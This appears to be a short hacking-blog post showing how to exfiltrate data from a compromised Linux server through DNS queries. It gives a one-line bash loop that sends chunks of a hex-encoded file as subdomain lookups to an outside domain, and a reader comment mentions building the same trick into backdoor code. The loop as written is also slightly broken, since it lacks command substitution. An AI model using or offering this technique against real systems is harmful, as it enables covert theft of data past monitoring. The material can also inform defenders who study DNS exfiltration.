Exfiltrating Data Via DNS Requests | Hack all things

In this installment of Hack All The Things we will be discussing how to leverage DNS requests to exfiltrate data from a server. Note that while this is on on a Linux “victim” the same can be done in Windows using VBScript, Powershell, and even the fairly limited cmd.exe command prompt.

A very simple way to exfil data via a DNS request. It might be discovered by some monitoring software, but it's so simple it's a good trick to have as a last resort.

The simple BASH script:

for merp in cat exfilMe.hex; do dig $merp.exfil.hacktalk.net; done

We've been using a similar approach, however we coded the DNS exfil command on our own backdoor code.

A full post on the importance of data exfil is coming tomorrow.

System recon

Quote of the day